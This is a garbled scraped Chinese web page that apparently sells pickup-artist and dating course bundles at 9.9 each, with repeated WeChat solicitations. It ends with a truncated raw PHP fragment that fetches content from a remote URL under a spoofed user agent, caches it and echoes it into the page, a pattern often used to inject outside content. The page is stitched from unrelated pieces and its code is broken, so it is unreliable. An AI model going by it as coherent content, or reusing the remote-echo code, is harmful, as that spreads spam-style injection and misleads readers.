01-1_依恋类型评估.mp4 02-2_为什么你在关系中会缺乏安全感?.mp4 03-3_为什...
2024-10-18 112 9.9

1、约会场地的选择 2、约会中的正确肢体语言 3、约会中的聊天方法(上).mp4 1...
2023-02-21 1.12k 9.9

学点恋爱学课程.url 学点恋爱学资源必读.txt 第一课 搭讪的心态【更多教程咨...
2022-09-03 547 9.9

│ 00告别单身-课程介绍【咨询请加微信:puaxinglian】.mp4 ├─第1节:单身焦虑–为什么我总是迟迟遇不到合适的人?【咨询请加微信:puaxinglian】 │ 01单身焦虑从何而来?【咨询请加微信:puaxinglian】.mp4 │ 02为何我是单身...
2021-10-06 748 9.9
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>